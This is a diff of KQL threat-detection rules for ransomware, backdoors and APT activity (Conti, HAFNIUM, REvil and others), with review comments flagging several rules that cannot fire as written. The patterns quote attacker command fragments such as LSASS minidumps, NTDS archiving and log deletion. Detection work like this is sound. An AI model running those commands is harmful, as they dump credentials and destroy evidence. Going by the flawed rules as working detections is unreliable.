+// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -single " and FolderPath startswith "C:\\Users\\Public\\") or (ProcessCommandLine contains "del C:\\Windows\\System32\\Taskmgr.exe" or ProcessCommandLine contains ";Set-Service -StartupType Disabled $" or ProcessCommandLine contains "powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(" or ProcessCommandLine contains " do start wordpad.exe /p ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql
new file mode 100644
index 00000000..aab5306a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql
@@ -0,0 +1,10 @@
+// Title: Conti NTDS Exfiltration Command
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to exfiltrate NTDS
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "7za.exe" and ProcessCommandLine contains "\\C$\\temp\\log.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql
new file mode 100644
index 00000000..98a53527
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql
@@ -0,0 +1,10 @@
+// Title: Conti Volume Shadow Listing
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to find volume shadow backups
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "log.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql
new file mode 100644
index 00000000..773d6450
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Conti Ransomware Activity
+// Author: frack113
+// Date: 2021-10-12
+// Level: critical
+// Description: Detects a specific command used by the Conti ransomware group
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-m " and ProcessCommandLine contains "-net " and ProcessCommandLine contains "-size " and ProcessCommandLine contains "-nomutex " and ProcessCommandLine contains "-p \\\\" and ProcessCommandLine contains "$"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
new file mode 100644
index 00000000..b2296125
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
@@ -0,0 +1,10 @@
+// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd
+// Author: frack113
+// Date: 2021-08-16
+// Level: high
+// Description: Detects a command used by conti to dump database
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sys.sysprocesses" or ProcessCommandLine contains "master.dbo.sysdatabases" or ProcessCommandLine contains "BACKUP DATABASE") and ProcessCommandLine contains " -S localhost " and (FolderPath endswith "\\sqlcmd.exe" or (ProcessCommandLine contains "sqlcmd " or ProcessCommandLine contains "sqlcmd.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql
new file mode 100644
index 00000000..8096e68e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql
@@ -0,0 +1,12 @@
+// Title: DarkSide Ransomware Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: critical
+// Description: Detects DarkSide Ransomware and helpers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+// - UAC bypass method used by other malware
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "=[char][byte]('0x'+" or ProcessCommandLine contains " -work worker0 -path ") or (FolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessCommandLine contains "DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql
new file mode 100644
index 00000000..3b1c17b9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql
@@ -0,0 +1,12 @@
+// Title: Potential Devil Bait Malware Reconnaissance
+// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific process behavior observed with Devil Bait samples
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "ipconfig\\s+/all" or (ProcessCommandLine contains "dir" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist")) and (ProcessCommandLine contains ">>%APPDATA%\\Microsoft\\" and (ProcessCommandLine endswith ".xml" or ProcessCommandLine endswith ".txt") and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql
new file mode 100644
index 00000000..51270f60
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql
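Review bot: `ProcessCommandLine matches regex "ipconfig\\s+/all"` on the last `+` line of the reconnaissance hunk is case-sensitive (KQL `matches regex` is RE2 with no flags), while every other term in the same clause uses the case-insensitive `contains`/`endswith`, so `IPCONFIG /ALL` from a batch script would be missed by this branch. Prefix the pattern to make it consistent: `ProcessCommandLine matches regex "(?i)ipconfig\\s+/all"`. Sigma's `re` modifier is case-sensitive by default, so this may mirror upstream, but a converter that emits case-insensitive operators everywhere else should probably emit `(?i)` here too.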
@@ -0,0 +1,12 @@
+// Title: Potential Devil Bait Related Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\" and (FolderPath endswith ".txt" or FolderPath endswith ".xml")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql
new file mode 100644
index 00000000..671f391a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql
@@ -0,0 +1,12 @@
+// Title: FoggyWeb Backdoor DLL Loading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-27
+// Level: critical
+// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\ADFS\\version.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql
new file mode 100644
index 00000000..50561a0f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql
@@ -0,0 +1,12 @@
+// Title: Goofy Guineapig Backdoor IOC
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects malicious indicators seen used by the Goofy Guineapig malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath in~ ("C:\\ProgramData\\GoogleUpdate\\config.dat", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat", "C:\\ProgramData\\GoogleUpdate\\goopdate.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql
new file mode 100644
index 00000000..afea09da
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Goofy Guineapig Backdoor Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "choice /t %d /d y /n >nul"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
new file mode 100644
index 00000000..52be6fd3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\GoogleUpdate.exe" and InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe") and (not(((FolderPath startswith "C:\\Program Files\\Google\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\") or FolderPath contains "\\AppData\\Local\\Google\\Update\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql
new file mode 100644
index 00000000..f7bf0450
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql
@@ -0,0 +1,10 @@
+// Title: Moriya Rootkit File Created
+// Author: Bhabesh Raj
+// Date: 2021-05-06
+// Level: critical
+// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql
new file mode 100644
index 00000000..26388339
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential NetWire RAT Activity - Registry
+// Author: Christopher Peacock
+// Date: 2021-10-07
+// Level: high
+// Description: Detects registry keys related to NetWire RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\software\\NetWire"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql
new file mode 100644
index 00000000..f6d934a8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "config" and ProcessCommandLine contains "msdtc" and ProcessCommandLine contains "start" and ProcessCommandLine contains "auto") and InitiatingProcessFolderPath endswith "\\updata.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql
new file mode 100644
index 00000000..59429104
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor DLL Loading Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\oci.dll" and InitiatingProcessFolderPath endswith "\\msdtc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql
new file mode 100644
index 00000000..5a1d7091
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor File Indicators
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "updata.exe" and FolderPath =~ "C:\\Windows\\oci.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql
new file mode 100644
index 00000000..8c269693
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware CommandLine Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith ".exe Platypus"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql
new file mode 100644
index 00000000..c836847d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware File Indicator Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "Microsift" and ((FolderPath contains "\\Roaming\\" or FolderPath contains "\\Local\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\"))) or FolderPath endswith "\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql
new file mode 100644
index 00000000..bec70afe
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware Registry Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*" and (RegistryKey contains "Microsift" or RegistryValueData contains ".exe Platypus")
\ No newline at end of file
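Review bot: `RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*"` on the last `+` line of the registry-persistence hunk carries a literal `*`; KQL string operators have no wildcards, so this only matches keys that literally end in `Run*` and the rule can never fire. The Sigma wildcard should have been translated away, e.g. `RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Run"`, which also covers `RunOnce`. Separately, `DeviceRegistryEvents` keeps the value name in `RegistryValueName` rather than in `RegistryKey`, so `RegistryKey contains "Microsift"` likely needs an `or RegistryValueName contains "Microsift"` companion; I cannot tell from the hunk whether the upstream indicator is the key or the value name.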
diff --git a/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql
new file mode 100644
index 00000000..1e7b3461
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql
@@ -0,0 +1,12 @@
+// Title: HAFNIUM Exchange Exploitation Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-09
+// Level: critical
+// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -t7z " and ProcessCommandLine contains "C:\\Programdata\\pst" and ProcessCommandLine contains "\\it.zip") or (ProcessCommandLine contains "attrib" and ProcessCommandLine contains " +h " and ProcessCommandLine contains " +s " and ProcessCommandLine contains " +r " and ProcessCommandLine contains ".aspx") or ((ProcessCommandLine contains "inetpub\\wwwroot\\" and ProcessCommandLine contains ".dmp.zip") and FolderPath endswith "\\makecab.exe") or ((ProcessCommandLine contains "Microsoft\\Exchange Server\\" or ProcessCommandLine contains "compressionmemory" or ProcessCommandLine contains ".gif") and FolderPath endswith "\\makecab.exe") or (FolderPath endswith "Opera_browser.exe" and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")) or FolderPath endswith "Users\\Public\\opera\\Opera_browser.exe" or (ProcessCommandLine contains "Windows\\Temp\\xx.bat" or ProcessCommandLine contains "Windows\\WwanSvcdcs" or ProcessCommandLine contains "Windows\\Temp\\cw.exe") or (ProcessCommandLine contains "\\comsvcs.dll" and ProcessCommandLine contains "Minidump" and ProcessCommandLine contains "full " and ProcessCommandLine contains "\\inetpub\\wwwroot") or (FolderPath contains "\\ProgramData\\VSPerfMon\\" or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "VSPerfMon")) or (ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "Temp\\__output")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql
new file mode 100644
index 00000000..869f074e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql
@@ -0,0 +1,10 @@
+// Title: REvil Kaseya Incident Malware Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-03
+// Level: critical
+// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\Windows\\cert.exe" or ProcessCommandLine contains "del /q /f c:\\kworking\\agent.crt" or ProcessCommandLine contains "Kaseya VSA Agent Hot-fix" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\MsMpEng.exe" or ProcessCommandLine contains "rmdir /s /q %SystemDrive%\\inetpub\\logs" or (ProcessCommandLine contains "del /s /q /f %SystemDrive%\\" and ProcessCommandLine contains ".log") or ProcessCommandLine contains "c:\\kworking1\\agent.exe" or ProcessCommandLine contains "c:\\kworking1\\agent.crt") or (FolderPath in~ ("C:\\Windows\\MsMpEng.exe", "C:\\Windows\\cert.exe", "C:\\kworking\\agent.exe", "C:\\kworking1\\agent.exe")) or (ProcessCommandLine contains "del /s /q /f" and ProcessCommandLine contains "WebPages\\Errors\\webErrorLog.txt")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql
new file mode 100644
index 00000000..18e571bf
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql
@@ -0,0 +1,12 @@
+// Title: APT PRIVATELOG Image Load Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-07
+// Level: high
+// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats
+// False Positives:
+// - Rarely observed
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\clfsw32.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql
new file mode 100644
index 00000000..04ffdd6d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql
@@ -0,0 +1,10 @@
+// Title: SOURGUM Actor Behaviours
+// Author: MSTIC, FPT.EagleEye
+// Date: 2021-06-15
+// Level: high
+// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
+// MITRE Tactic: Persistence
+// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath contains "windows\\system32\\Physmem.sys" or FolderPath contains "Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini") or ((ProcessCommandLine contains "reg add" and (FolderPath contains "windows\\system32\\filepath2" or FolderPath contains "windows\\system32\\ime")) and (ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32" or ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql
new file mode 100644
index 00000000..8dc33cc3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql
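Review bot: The first OR-group on the last `+` line of the SOURGUM hunk tests `DeviceProcessEvents.FolderPath` — the path of the created process image — against `Physmem.sys` and three `WimBootConfigurations.ini` paths; a driver or `.ini` file is never a process image, so that branch can never match and those four indicators are silently lost. They read like file-creation indicators and presumably belong in a separate `DeviceFileEvents | where FolderPath contains ...` query, which suggests the converter folded a `file_event` selection into the process-creation table. `windows\\system32\\filepath2` in the second group also looks like a placeholder that survived from the source material and should be confirmed before this ships at level high.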
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-21554 QueueJumper Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-12
+// Level: high
+// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\Windows\\System32\\mqsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
new file mode 100644
index 00000000..6f8a15bb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
+// Author: @kostastsale
+// Date: 2022-04-25
+// Level: medium
+// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
+// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats
+// False Positives:
+// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\prunsrv.exe" and ((ProcessCommandLine contains "/c powershell" and FolderPath endswith "\\cmd.exe") or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
